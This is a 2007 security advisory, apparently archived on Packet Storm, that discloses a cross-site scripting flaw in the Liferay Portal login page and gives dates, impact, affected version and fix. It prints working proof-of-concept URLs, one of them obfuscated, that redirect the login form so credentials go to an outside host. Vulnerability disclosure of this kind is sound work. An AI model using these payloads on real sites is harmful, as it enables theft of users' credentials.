exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ProCheckUp Security Advisory 2007.2

ProCheckUp Security Advisory 2007.2
Posted Nov 16, 2007
Authored by Adrian Pastor, ProCheckUp | Site procheckup.com

The Liferay Portal login page is vulnerable to a cross site scripting vulnerability within the "login" field processed by the "/c/portal/login" server-side script.

tags | exploit, xss
SHA-256 | c5b4c300ba8f9b20584c800933c0325a4d4d46f7e96b287d9a80d0e033cff5fd

ProCheckUp Security Advisory 2007.2

Change Mirror Download
Date Found: 6th March 2007

Vendor informed: 26th June 2007

Description:

Liferay Portal login page is vulnerable to
Cross-Site Scripting within the "login" field processed by the "/c/portal/login" server-side script.

Consequences:

An attacker may be able to cause the execution of malicious script code in the browser of a user who visits a specially-crafted Liferay Portal URL, or visits a page that submits a request to such URL. Such code would run within the security context of the target domain.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: usernames and passwords) to unauthorised third parties.

Proof of concept (PoC):

The provided XSS PoC URLs overwrite Liferay Portal login form's 'action' attribute. Thus, when the victim user clicks on the "Sign In" button, the credentials (username/password) are sent to a third-party site (procheckup.com in this case).

http://target.tld/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http://procheckup.com%22%3C/script%3E%3Ca%20b=%22c
http://target.tld/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http%3a%2f%2f%70roch%65cku%70%2e%63om%22%3C/script%3E%3Ca%20b=%22c

Injected payload:

"><script>document.fm1.action="http://procheckup.com"</script><a b="c

What's (partially) returned by the server:

<input class="form-text" name="login" style="width: 150px;" type="text" value=""><script>document.fm1.action="http://procheckup.com"</script><a b="c">

Note: the victim user does not need to be authenticated for this vulnerability to be exploitable.

Successfully tested on:

Liferay-Portal: Liferay Portal Enterprise 4.1.1 (Cowper / Build 3101 / August 14, 2006)

(other versions of Liferay Portal might also be affected)

Severity: Medium/High

Author: Adrian Pastor [adrian.pastor [at] procheckup.com] from ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks Liferay for fixing this vulnerability so promptly.

References:

http://www.liferay.com/

http://www.procheckup.com/Vulnerability_2007.php

Fix:

The issue was fixed a while back, but re-surfaced in 4.1.0 and 4.1.1.

This issue has been fixed on version 4.1.3 and onwards.
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close